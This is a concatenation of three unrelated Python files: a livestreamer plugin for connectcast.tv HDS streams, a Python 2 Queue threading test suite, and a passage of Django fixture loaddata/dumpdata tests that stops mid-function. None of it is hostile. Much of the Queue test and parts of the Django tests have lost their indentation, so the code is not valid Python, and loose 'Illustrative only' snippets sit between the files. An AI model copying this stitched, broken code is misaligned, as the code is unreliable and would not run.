import re
from livestreamer.plugin import Plugin
from livestreamer.plugin.api import http, validate
from livestreamer.stream import HDSStream
SWF_URL = "https://www.connectcast.tv/jwplayer/jwplayer.flash.swf"
_url_re = re.compile(r"https?://(\w+\.)?connectcast\.tv/")
_manifest_re = re.compile(r'.*data-playback="([^"]*)".*')
class ConnectCast(Plugin):
    @classmethod
    def can_handle_url(cls, url):
        return _url_re.match(url)
    def _get_streams(self):
        res = http.get(self.url)
        match = _manifest_re.search(res.text)
        if not match:
            return
        manifest = match.group(1)
        streams = {}
        streams.update(
            HDSStream.parse_manifest(self.session, manifest, pvswf=SWF_URL)
        )
        return streams
__plugin__ = ConnectCast
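# Illustrative only, not part of the plugin: a quick sanity check of the two
# regexes above. The URL and HTML snippet are made up for the example.
if __name__ == "__main__":
    assert _url_re.match("https://www.connectcast.tv/somechannel")
    sample = '<video data-playback="http://example.com/live/manifest.f4m">'
    found = _manifest_re.search(sample)
    assert found and found.group(1) == "http://example.com/live/manifest.f4m"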
import Queue
import sys
import threading
import time
from test.test_support import verify, TestFailed, verbose
QUEUE_SIZE = 5
class _TriggerThread(threading.Thread):
def __init__(self, fn, args):
self.fn = fn
self.args = args
self.startedEvent = threading.Event()
threading.Thread.__init__(self)
def run(self):
# The sleep isn't necessary, but is intended to give the blocking
# function in the main thread a chance at actually blocking before
# we unclog it. But if the sleep is longer than the timeout-based
# tests wait in their blocking functions, those tests will fail.
# So we give them much longer timeout values compared to the
# sleep here (I aimed at 10 seconds for blocking functions --
# they should never actually wait that long - they should make
# progress as soon as we call self.fn()).
time.sleep(0.1)
self.startedEvent.set()
self.fn(*self.args)
def _doBlockingTest(block_func, block_args, trigger_func, trigger_args):
t = _TriggerThread(trigger_func, trigger_args)
t.start()
result = block_func(*block_args)
# If block_func returned before our thread made the call, we failed!
if not t.startedEvent.isSet():
raise TestFailed("blocking function '%r' appeared not to block" %
block_func)
t.join(10) # make sure the thread terminates
if t.isAlive():
raise TestFailed("trigger function '%r' appeared to not return" %
trigger_func)
return result
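# Illustrative only: the helper above in its simplest use -- q.get() blocks
# until the trigger thread performs q.put() roughly 0.1s later:
#   q = Queue.Queue()
#   assert _doBlockingTest(q.get, (), q.put, ("item",)) == "item"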
def _doExceptionalBlockingTest(block_func, block_args, trigger_func,
trigger_args, expected_exception_class):
t = _TriggerThread(trigger_func, trigger_args)
t.start()
try:
try:
block_func(*block_args)
except expected_exception_class:
raise
else:
raise TestFailed("expected exception of kind %r" %
expected_exception_class)
finally:
t.join(10) # make sure the thread terminates
if t.isAlive():
raise TestFailed("trigger function '%r' appeared to not return" %
trigger_func)
if not t.startedEvent.isSet():
raise TestFailed("trigger thread ended but event never set")
class FailingQueueException(Exception):
pass
class FailingQueue(Queue.Queue):
def __init__(self, *args):
self.fail_next_put = False
self.fail_next_get = False
Queue.Queue.__init__(self, *args)
def _put(self, item):
if self.fail_next_put:
self.fail_next_put = False
            raise FailingQueueException("You Lose")
return Queue.Queue._put(self, item)
def _get(self):
if self.fail_next_get:
self.fail_next_get = False
            raise FailingQueueException("You Lose")
return Queue.Queue._get(self)
def FailingQueueTest(q):
if not q.empty():
        raise RuntimeError("Call this function with an empty queue")
for i in range(QUEUE_SIZE-1):
q.put(i)
# Test a failing non-blocking put.
q.fail_next_put = True
try:
q.put("oops", block=0)
raise TestFailed("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.fail_next_put = True
try:
q.put("oops", timeout=0.1)
raise TestFailed("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.put("last")
verify(q.full(), "Queue should be full")
# Test a failing blocking put
q.fail_next_put = True
try:
_doBlockingTest(q.put, ("full",), q.get, ())
raise TestFailed("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
# Test a failing timeout put
q.fail_next_put = True
try:
_doExceptionalBlockingTest(q.put, ("full", True, 10), q.get, (),
FailingQueueException)
raise TestFailed("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
verify(q.full(), "Queue should be full")
q.get()
verify(not q.full(), "Queue should not be full")
q.put("last")
verify(q.full(), "Queue should be full")
# Test a blocking put
    _doBlockingTest(q.put, ("full",), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
verify(q.empty(), "Queue should be empty")
q.put("first")
q.fail_next_get = True
try:
q.get()
raise TestFailed("The queue didn't fail when it should have")
except FailingQueueException:
pass
verify(not q.empty(), "Queue should not be empty")
q.fail_next_get = True
try:
q.get(timeout=0.1)
raise TestFailed("The queue didn't fail when it should have")
except FailingQueueException:
pass
verify(not q.empty(), "Queue should not be empty")
q.get()
verify(q.empty(), "Queue should be empty")
q.fail_next_get = True
try:
_doExceptionalBlockingTest(q.get, (), q.put, ('empty',),
FailingQueueException)
raise TestFailed("The queue didn't fail when it should have")
except FailingQueueException:
pass
# put succeeded, but get failed.
verify(not q.empty(), "Queue should not be empty")
q.get()
verify(q.empty(), "Queue should be empty")
def SimpleQueueTest(q):
if not q.empty():
        raise RuntimeError("Call this function with an empty queue")
# I guess we better check things actually queue correctly a little :)
q.put(111)
q.put(222)
verify(q.get() == 111 and q.get() == 222,
"Didn't seem to queue the correct data!")
for i in range(QUEUE_SIZE-1):
q.put(i)
verify(not q.empty(), "Queue should not be empty")
verify(not q.full(), "Queue should not be full")
q.put("last")
verify(q.full(), "Queue should be full")
try:
q.put("full", block=0)
raise TestFailed("Didn't appear to block with a full queue")
except Queue.Full:
pass
try:
q.put("full", timeout=0.01)
raise TestFailed("Didn't appear to time-out with a full queue")
except Queue.Full:
pass
# Test a blocking put
_doBlockingTest(q.put, ("full",), q.get, ())
_doBlockingTest(q.put, ("full", True, 10), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
verify(q.empty(), "Queue should be empty")
try:
q.get(block=0)
raise TestFailed("Didn't appear to block with an empty queue")
except Queue.Empty:
pass
try:
q.get(timeout=0.01)
raise TestFailed("Didn't appear to time-out with an empty queue")
except Queue.Empty:
pass
# Test a blocking get
_doBlockingTest(q.get, (), q.put, ('empty',))
_doBlockingTest(q.get, (True, 10), q.put, ('empty',))
cum = 0
cumlock = threading.Lock()
def worker(q):
global cum
while True:
x = q.get()
if x is None:
q.task_done()
return
cumlock.acquire()
try:
cum += x
finally:
cumlock.release()
q.task_done()
def QueueJoinTest(q):
global cum
cum = 0
for i in (0,1):
threading.Thread(target=worker, args=(q,)).start()
for i in xrange(100):
q.put(i)
q.join()
verify(cum==sum(range(100)), "q.join() did not block until all tasks were done")
for i in (0,1):
q.put(None) # instruct the threads to close
q.join() # verify that you can join twice
def QueueTaskDoneTest(q):
try:
q.task_done()
except ValueError:
pass
else:
raise TestFailed("Did not detect task count going negative")
def test():
q = Queue.Queue()
QueueTaskDoneTest(q)
QueueJoinTest(q)
QueueJoinTest(q)
QueueTaskDoneTest(q)
q = Queue.Queue(QUEUE_SIZE)
# Do it a couple of times on the same queue
SimpleQueueTest(q)
SimpleQueueTest(q)
if verbose:
print "Simple Queue tests seemed to work"
q = FailingQueue(QUEUE_SIZE)
FailingQueueTest(q)
FailingQueueTest(q)
if verbose:
print "Failing Queue tests seemed to work"
test()
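# Illustrative only: the task_done()/join() protocol that QueueJoinTest
# exercises above, shown in isolation. Every get() is matched by a
# task_done(); join() returns once all enqueued items are marked done.
def _join_protocol_demo():
    q = Queue.Queue()
    def drain():
        while True:
            item = q.get()
            q.task_done()  # each get() must be balanced by task_done()
            if item is None:
                return
    t = threading.Thread(target=drain)
    t.start()
    for i in range(10):
        q.put(i)
    q.put(None)  # sentinel telling the worker to exit
    q.join()     # blocks until all 11 items have been task_done()
    t.join()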
import os
import sys
import tempfile
import unittest
import warnings
from io import StringIO
from unittest import mock
from django.apps import apps
from django.contrib.sites.models import Site
from django.core import management
from django.core.files.temp import NamedTemporaryFile
from django.core.management import CommandError
from django.core.management.commands.dumpdata import ProxyModelWarning
from django.core.serializers.base import ProgressBar
from django.db import IntegrityError, connection
from django.test import TestCase, TransactionTestCase, skipUnlessDBFeature
from .models import (
Article, Category, PrimaryKeyUUIDModel, ProxySpy, Spy, Tag, Visa,
)
class TestCaseFixtureLoadingTests(TestCase):
fixtures = ['fixture1.json', 'fixture2.json']
def testClassFixtures(self):
"Test case has installed 3 fixture objects"
self.assertEqual(Article.objects.count(), 3)
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: Django conquers world!>',
'<Article: Copyright is fine the way it is>',
'<Article: Poker has no place on ESPN>',
])
class SubclassTestCaseFixtureLoadingTests(TestCaseFixtureLoadingTests):
"""
Make sure that subclasses can remove fixtures from parent class (#21089).
"""
fixtures = []
def testClassFixtures(self):
"There were no fixture objects installed"
self.assertEqual(Article.objects.count(), 0)
class DumpDataAssertMixin:
    def _dumpdata_assert(self, args, output, format='json', filename=None,
                         natural_foreign_keys=False, natural_primary_keys=False,
                         use_base_manager=False, exclude_list=None, primary_keys=''):
        new_io = StringIO()
        if filename:
            filename = os.path.join(tempfile.gettempdir(), filename)
        management.call_command('dumpdata', *args, **{'format': format,
                                                      'stdout': new_io,
                                                      'stderr': new_io,
                                                      'output': filename,
                                                      'use_natural_foreign_keys': natural_foreign_keys,
                                                      'use_natural_primary_keys': natural_primary_keys,
                                                      'use_base_manager': use_base_manager,
                                                      'exclude': exclude_list or [],
                                                      'primary_keys': primary_keys})
if filename:
with open(filename, "r") as f:
command_output = f.read()
os.remove(filename)
else:
command_output = new_io.getvalue().strip()
if format == "json":
self.assertJSONEqual(command_output, output)
elif format == "xml":
self.assertXMLEqual(command_output, output)
else:
self.assertEqual(command_output, output)
class FixtureLoadingTests(DumpDataAssertMixin, TestCase):
def test_loading_and_dumping(self):
apps.clear_cache()
Site.objects.all().delete()
# Load fixture 1. Single JSON file, with two objects.
management.call_command('loaddata', 'fixture1.json', verbosity=0)
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: Time to reform copyright>',
'<Article: Poker has no place on ESPN>',
])
# Dump the current contents of the database as a JSON fixture
self._dumpdata_assert(
['fixtures'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}, {"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place '
'on ESPN", "pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": '
'{"headline": "Time to reform copyright", "pub_date": "2006-06-16T13:00:00"}}]'
)
# Try just dumping the contents of fixtures.Category
self._dumpdata_assert(
['fixtures.Category'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", '
'"title": "News Stories"}}]'
)
# ...and just fixtures.Article
self._dumpdata_assert(
['fixtures.Article'],
'[{"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place on ESPN", '
'"pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": {"headline": '
'"Time to reform copyright", "pub_date": "2006-06-16T13:00:00"}}]'
)
# ...and both
self._dumpdata_assert(
['fixtures.Category', 'fixtures.Article'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", '
'"title": "News Stories"}}, {"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has '
'no place on ESPN", "pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", '
'"fields": {"headline": "Time to reform copyright", "pub_date": "2006-06-16T13:00:00"}}]'
)
# Specify a specific model twice
self._dumpdata_assert(
['fixtures.Article', 'fixtures.Article'],
(
'[{"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place on ESPN", '
'"pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": {"headline": '
'"Time to reform copyright", "pub_date": "2006-06-16T13:00:00"}}]'
)
)
# Specify a dump that specifies Article both explicitly and implicitly
self._dumpdata_assert(
['fixtures.Article', 'fixtures'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}, {"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place '
'on ESPN", "pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": '
'{"headline": "Time to reform copyright", "pub_date": "2006-06-16T13:00:00"}}]'
)
# Specify a dump that specifies Article both explicitly and implicitly,
# but lists the app first (#22025).
self._dumpdata_assert(
['fixtures', 'fixtures.Article'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}, {"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place '
'on ESPN", "pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": '
'{"headline": "Time to reform copyright", "pub_date": "2006-06-16T13:00:00"}}]'
)
# Same again, but specify in the reverse order
self._dumpdata_assert(
['fixtures'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}, {"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no '
'place on ESPN", "pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields":'
' {"headline": "Time to reform copyright", "pub_date": "2006-06-16T13:00:00"}}]'
)
# Specify one model from one application, and an entire other application.
self._dumpdata_assert(
['fixtures.Category', 'sites'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}, {"pk": 1, "model": "sites.site", "fields": {"domain": "example.com", "name": '
'"example.com"}}]'
)
# Load fixture 2. JSON file imported by default. Overwrites some existing objects
management.call_command('loaddata', 'fixture2.json', verbosity=0)
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: Django conquers world!>',
'<Article: Copyright is fine the way it is>',
'<Article: Poker has no place on ESPN>',
])
# Load fixture 3, XML format.
management.call_command('loaddata', 'fixture3.xml', verbosity=0)
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: XML identified as leading cause of cancer>',
'<Article: Django conquers world!>',
'<Article: Copyright is fine the way it is>',
'<Article: Poker on TV is great!>',
])
# Load fixture 6, JSON file with dynamic ContentType fields. Testing ManyToOne.
management.call_command('loaddata', 'fixture6.json', verbosity=0)
self.assertQuerysetEqual(Tag.objects.all(), [
'<Tag: <Article: Copyright is fine the way it is> tagged "copyright">',
'<Tag: <Article: Copyright is fine the way it is> tagged "law">',
], ordered=False)
# Load fixture 7, XML file with dynamic ContentType fields. Testing ManyToOne.
management.call_command('loaddata', 'fixture7.xml', verbosity=0)
self.assertQuerysetEqual(Tag.objects.all(), [
'<Tag: <Article: Copyright is fine the way it is> tagged "copyright">',
'<Tag: <Article: Copyright is fine the way it is> tagged "legal">',
'<Tag: <Article: Django conquers world!> tagged "django">',
'<Tag: <Article: Django conquers world!> tagged "world domination">',
], ordered=False)
# Load fixture 8, JSON file with dynamic Permission fields. Testing ManyToMany.
management.call_command('loaddata', 'fixture8.json', verbosity=0)
self.assertQuerysetEqual(Visa.objects.all(), [
'<Visa: Django Reinhardt Can add user, Can change user, Can delete user>',
'<Visa: Stephane Grappelli Can add user>',
'<Visa: Prince >'
], ordered=False)
# Load fixture 9, XML file with dynamic Permission fields. Testing ManyToMany.
management.call_command('loaddata', 'fixture9.xml', verbosity=0)
self.assertQuerysetEqual(Visa.objects.all(), [
'<Visa: Django Reinhardt Can add user, Can change user, Can delete user>',
'<Visa: Stephane Grappelli Can add user, Can delete user>',
'<Visa: Artist formerly known as "Prince" Can change user>'
], ordered=False)
# object list is unaffected
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: XML identified as leading cause of cancer>',
'<Article: Django conquers world!>',
'<Article: Copyright is fine the way it is>',
'<Article: Poker on TV is great!>',
])
# By default, you get raw keys on dumpdata
self._dumpdata_assert(
['fixtures.book'],
'[{"pk": 1, "model": "fixtures.book", "fields": {"name": "Music for all ages", "authors": [3, 1]}}]'
)
# But you can get natural keys if you ask for them and they are available
self._dumpdata_assert(
['fixtures.book'],
'[{"pk": 1, "model": "fixtures.book", "fields": {"name": "Music for all ages", "authors": [["Artist '
'formerly known as \\"Prince\\""], ["Django Reinhardt"]]}}]',
natural_foreign_keys=True
)
# You can also omit the primary keys for models that we can get later with natural keys.
self._dumpdata_assert(
['fixtures.person'],
'[{"fields": {"name": "Django Reinhardt"}, "model": "fixtures.person"}, {"fields": {"name": "Stephane '
'Grappelli"}, "model": "fixtures.person"}, {"fields": {"name": "Artist formerly known as '
'\\"Prince\\""}, "model": "fixtures.person"}]',
natural_primary_keys=True
)
# Dump the current contents of the database as a JSON fixture
self._dumpdata_assert(
['fixtures'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}, {"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker on TV is '
'great!", "pub_date": "2006-06-16T11:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": '
'{"headline": "Copyright is fine the way it is", "pub_date": "2006-06-16T14:00:00"}}, {"pk": 4, '
'"model": "fixtures.article", "fields": {"headline": "Django conquers world!", "pub_date": '
'"2006-06-16T15:00:00"}}, {"pk": 5, "model": "fixtures.article", "fields": {"headline": "XML '
'identified as leading cause of cancer", "pub_date": "2006-06-16T16:00:00"}}, {"pk": 1, "model": '
'"fixtures.tag", "fields": {"tagged_type": ["fixtures", "article"], "name": "copyright", "tagged_id": '
'3}}, {"pk": 2, "model": "fixtures.tag", "fields": {"tagged_type": ["fixtures", "article"], "name": '
'"legal", "tagged_id": 3}}, {"pk": 3, "model": "fixtures.tag", "fields": {"tagged_type": ["fixtures", '
'"article"], "name": "django", "tagged_id": 4}}, {"pk": 4, "model": "fixtures.tag", "fields": '
'{"tagged_type": ["fixtures", "article"], "name": "world domination", "tagged_id": 4}}, {"pk": 1, '
'"model": "fixtures.person", "fields": {"name": "Django Reinhardt"}}, {"pk": 2, "model": '
'"fixtures.person", "fields": {"name": "Stephane Grappelli"}}, {"pk": 3, "model": "fixtures.person", '
'"fields": {"name": "Artist formerly known as \\"Prince\\""}}, {"pk": 1, "model": "fixtures.visa", '
'"fields": {"person": ["Django Reinhardt"], "permissions": [["add_user", "auth", "user"], '
'["change_user", "auth", "user"], ["delete_user", "auth", "user"]]}}, {"pk": 2, "model": '
'"fixtures.visa", "fields": {"person": ["Stephane Grappelli"], "permissions": [["add_user", "auth", '
'"user"], ["delete_user", "auth", "user"]]}}, {"pk": 3, "model": "fixtures.visa", "fields": {"person":'
' ["Artist formerly known as \\"Prince\\""], "permissions": [["change_user", "auth", "user"]]}}, '
'{"pk": 1, "model": "fixtures.book", "fields": {"name": "Music for all ages", "authors": [["Artist '
'formerly known as \\"Prince\\""], ["Django Reinhardt"]]}}]',
natural_foreign_keys=True
)
# Dump the current contents of the database as an XML fixture
self._dumpdata_assert(
['fixtures'],
'<?xml version="1.0" encoding="utf-8"?><django-objects version="1.0"><object pk="1" '
'model="fixtures.category"><field type="CharField" name="title">News Stories</field><field '
'type="TextField" name="description">Latest news stories</field></object><object pk="2" '
'model="fixtures.article"><field type="CharField" name="headline">Poker on TV is great!</field><field '
'type="DateTimeField" name="pub_date">2006-06-16T11:00:00</field></object><object pk="3" '
'model="fixtures.article"><field type="CharField" name="headline">Copyright is fine the way it '
'is</field><field type="DateTimeField" name="pub_date">2006-06-16T14:00:00</field></object><object '
'pk="4" model="fixtures.article"><field type="CharField" name="headline">Django conquers world!'
'</field><field type="DateTimeField" name="pub_date">2006-06-16T15:00:00</field></object><object '
'pk="5" model="fixtures.article"><field type="CharField" name="headline">XML identified as leading '
'cause of cancer</field><field type="DateTimeField" name="pub_date">2006-06-16T16:00:00</field>'
'</object><object pk="1" model="fixtures.tag"><field type="CharField" name="name">copyright</field>'
'<field to="contenttypes.contenttype" name="tagged_type" rel="ManyToOneRel"><natural>fixtures'
'</natural><natural>article</natural></field><field type="PositiveIntegerField" name="tagged_id">3'
'</field></object><object pk="2" model="fixtures.tag"><field type="CharField" name="name">legal'
'</field><field to="contenttypes.contenttype" name="tagged_type" rel="ManyToOneRel"><natural>'
'fixtures</natural><natural>article</natural></field><field type="PositiveIntegerField" '
'name="tagged_id">3</field></object><object pk="3" model="fixtures.tag"><field type="CharField" '
'name="name">django</field><field to="contenttypes.contenttype" name="tagged_type" '
'rel="ManyToOneRel"><natural>fixtures</natural><natural>article</natural></field><field '
'type="PositiveIntegerField" name="tagged_id">4</field></object><object pk="4" model="fixtures.tag">'
'<field type="CharField" name="name">world domination</field><field to="contenttypes.contenttype" '
'name="tagged_type" rel="ManyToOneRel"><natural>fixtures</natural><natural>article</natural></field>'
'<field type="PositiveIntegerField" name="tagged_id">4</field></object><object pk="1" '
'model="fixtures.person"><field type="CharField" name="name">Django Reinhardt</field></object>'
'<object pk="2" model="fixtures.person"><field type="CharField" name="name">Stephane Grappelli'
'</field></object><object pk="3" model="fixtures.person"><field type="CharField" name="name">'
'Artist formerly known as "Prince"</field></object><object pk="1" model="fixtures.visa"><field '
'to="fixtures.person" name="person" rel="ManyToOneRel"><natural>Django Reinhardt</natural></field>'
'<field to="auth.permission" name="permissions" rel="ManyToManyRel"><object><natural>add_user'
'</natural><natural>auth</natural><natural>user</natural></object><object><natural>change_user'
'</natural><natural>auth</natural><natural>user</natural></object><object><natural>delete_user'
'</natural><natural>auth</natural><natural>user</natural></object></field></object><object pk="2" '
'model="fixtures.visa"><field to="fixtures.person" name="person" rel="ManyToOneRel"><natural>Stephane'
' Grappelli</natural></field><field to="auth.permission" name="permissions" rel="ManyToManyRel">'
'<object><natural>add_user</natural><natural>auth</natural><natural>user</natural></object><object>'
'<natural>delete_user</natural><natural>auth</natural><natural>user</natural></object></field>'
'</object><object pk="3" model="fixtures.visa"><field to="fixtures.person" name="person" '
'rel="ManyToOneRel"><natural>Artist formerly known as "Prince"</natural></field><field '
'to="auth.permission" name="permissions" rel="ManyToManyRel"><object><natural>change_user</natural>'
'<natural>auth</natural><natural>user</natural></object></field></object><object pk="1" '
'model="fixtures.book"><field type="CharField" name="name">Music for all ages</field><field '
'to="fixtures.person" name="authors" rel="ManyToManyRel"><object><natural>Artist formerly known as '
'"Prince"</natural></object><object><natural>Django Reinhardt</natural></object></field></object>'
'</django-objects>',
format='xml', natural_foreign_keys=True
)
def test_dumpdata_with_excludes(self):
# Load fixture1 which has a site, two articles, and a category
Site.objects.all().delete()
management.call_command('loaddata', 'fixture1.json', verbosity=0)
# Excluding fixtures app should only leave sites
self._dumpdata_assert(
['sites', 'fixtures'],
'[{"pk": 1, "model": "sites.site", "fields": {"domain": "example.com", "name": "example.com"}}]',
exclude_list=['fixtures'])
# Excluding fixtures.Article/Book should leave fixtures.Category
self._dumpdata_assert(
['sites', 'fixtures'],
'[{"pk": 1, "model": "sites.site", "fields": {"domain": "example.com", "name": "example.com"}}, '
'{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}]',
exclude_list=['fixtures.Article', 'fixtures.Book']
)
# Excluding fixtures and fixtures.Article/Book should be a no-op
self._dumpdata_assert(
['sites', 'fixtures'],
'[{"pk": 1, "model": "sites.site", "fields": {"domain": "example.com", "name": "example.com"}}, '
'{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}]',
exclude_list=['fixtures.Article', 'fixtures.Book']
)
# Excluding sites and fixtures.Article/Book should only leave fixtures.Category
self._dumpdata_assert(
['sites', 'fixtures'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}]',
exclude_list=['fixtures.Article', 'fixtures.Book', 'sites']
)
# Excluding a bogus app should throw an error
with self.assertRaisesMessage(management.CommandError, "No installed app with label 'foo_app'."):
self._dumpdata_assert(['fixtures', 'sites'], '', exclude_list=['foo_app'])
# Excluding a bogus model should throw an error
with self.assertRaisesMessage(management.CommandError, "Unknown model: fixtures.FooModel"):
self._dumpdata_assert(['fixtures', 'sites'], '', exclude_list=['fixtures.FooModel'])
@unittest.skipIf(sys.platform.startswith('win'), "Windows doesn't support '?' in filenames.")
def test_load_fixture_with_special_characters(self):
management.call_command('loaddata', 'fixture_with[special]chars', verbosity=0)
self.assertQuerysetEqual(Article.objects.all(), ['<Article: How To Deal With Special Characters>'])
def test_dumpdata_with_filtering_manager(self):
spy1 = Spy.objects.create(name='Paul')
spy2 = Spy.objects.create(name='Alex', cover_blown=True)
self.assertQuerysetEqual(Spy.objects.all(),
['<Spy: Paul>'])
# Use the default manager
self._dumpdata_assert(
['fixtures.Spy'],
'[{"pk": %d, "model": "fixtures.spy", "fields": {"cover_blown": false}}]' % spy1.pk
)
# Dump using Django's base manager. Should return all objects,
# even those normally filtered by the manager
self._dumpdata_assert(
['fixtures.Spy'],
'[{"pk": %d, "model": "fixtures.spy", "fields": {"cover_blown": true}}, {"pk": %d, "model": '
'"fixtures.spy", "fields": {"cover_blown": false}}]' % (spy2.pk, spy1.pk),
use_base_manager=True
)
def test_dumpdata_with_pks(self):
management.call_command('loaddata', 'fixture1.json', verbosity=0)
management.call_command('loaddata', 'fixture2.json', verbosity=0)
self._dumpdata_assert(
['fixtures.Article'],
'[{"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place on ESPN", '
'"pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": {"headline": '
'"Copyright is fine the way it is", "pub_date": "2006-06-16T14:00:00"}}]',
primary_keys='2,3'
)
self._dumpdata_assert(
['fixtures.Article'],
'[{"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place on ESPN", '
'"pub_date": "2006-06-16T12:00:00"}}]',
primary_keys='2'
)
with self.assertRaisesMessage(management.CommandError, "You can only use --pks option with one model"):
self._dumpdata_assert(
['fixtures'],
'[{"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place on ESPN", '
'"pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": '
'{"headline": "Copyright is fine the way it is", "pub_date": "2006-06-16T14:00:00"}}]',
primary_keys='2,3'
)
with self.assertRaisesMessage(management.CommandError, "You can only use --pks option with one model"):
self._dumpdata_assert(
'',
'[{"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place on ESPN", '
'"pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": '
'{"headline": "Copyright is fine the way it is", "pub_date": "2006-06-16T14:00:00"}}]',
primary_keys='2,3'
)
with self.assertRaisesMessage(management.CommandError, "You can only use --pks option with one model"):
self._dumpdata_assert(
['fixtures.Article', 'fixtures.category'],
'[{"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place on ESPN", '
'"pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": '
'{"headline": "Copyright is fine the way it is", "pub_date": "2006-06-16T14:00:00"}}]',
primary_keys='2,3'
)
def test_dumpdata_with_uuid_pks(self):
m1 = PrimaryKeyUUIDModel.objects.create()
m2 = PrimaryKeyUUIDModel.objects.create()
output = StringIO()
management.call_command(
'dumpdata', 'fixtures.PrimaryKeyUUIDModel', '--pks', ', '.join([str(m1.id), str(m2.id)]),
stdout=output,
)
result = output.getvalue()
self.assertIn('"pk": "%s"' % m1.id, result)
self.assertIn('"pk": "%s"' % m2.id, result)
def test_dumpdata_with_file_output(self):
management.call_command('loaddata', 'fixture1.json', verbosity=0)
self._dumpdata_assert(
['fixtures'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}, {"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place '
'on ESPN", "pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": '
'{"headline": "Time to reform copyright", "pub_date": "2006-06-16T13:00:00"}}]',
filename='dumpdata.json'
)
def test_dumpdata_progressbar(self):
"""
Dumpdata shows a progress bar on the command line when --output is set,
stdout is a tty, and verbosity > 0.
"""
management.call_command('loaddata', 'fixture1.json', verbosity=0)
new_io = StringIO()
new_io.isatty = lambda: True
with NamedTemporaryFile() as file:
options = {
'format': 'json',
'stdout': new_io,
'stderr': new_io,
'output': file.name,
}
management.call_command('dumpdata', 'fixtures', **options)
self.assertTrue(new_io.getvalue().endswith('[' + '.' * ProgressBar.progress_width + ']\n'))
# Test no progress bar when verbosity = 0
options['verbosity'] = 0
new_io = StringIO()
new_io.isatty = lambda: True
options.update({'stdout': new_io, 'stderr': new_io})
management.call_command('dumpdata', 'fixtures', **options)
self.assertEqual(new_io.getvalue(), '')
def test_dumpdata_proxy_without_concrete(self):
"""
A warning is displayed if a proxy model is dumped without its concrete
parent.
"""
ProxySpy.objects.create(name='Paul')
with warnings.catch_warnings(record=True) as warning_list:
warnings.simplefilter('always')
self._dumpdata_assert(['fixtures.ProxySpy'], '[]')
warning = warning_list.pop()
self.assertEqual(warning.category, ProxyModelWarning)
self.assertEqual(
str(warning.message),
"fixtures.ProxySpy is a proxy model and won't be serialized."
)
def test_dumpdata_proxy_with_concrete(self):
"""
A warning isn't displayed if a proxy model is dumped with its concrete
parent.
"""
spy = ProxySpy.objects.create(name='Paul')
with warnings.catch_warnings(record=True) as warning_list:
warnings.simplefilter('always')
self._dumpdata_assert(
['fixtures.ProxySpy', 'fixtures.Spy'],
'[{"pk": %d, "model": "fixtures.spy", "fields": {"cover_blown": false}}]' % spy.pk
)
self.assertEqual(len(warning_list), 0)
def test_compress_format_loading(self):
# Load fixture 4 (compressed), using format specification
management.call_command('loaddata', 'fixture4.json', verbosity=0)
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: Django pets kitten>',
])
def test_compressed_specified_loading(self):
# Load fixture 5 (compressed), using format *and* compression specification
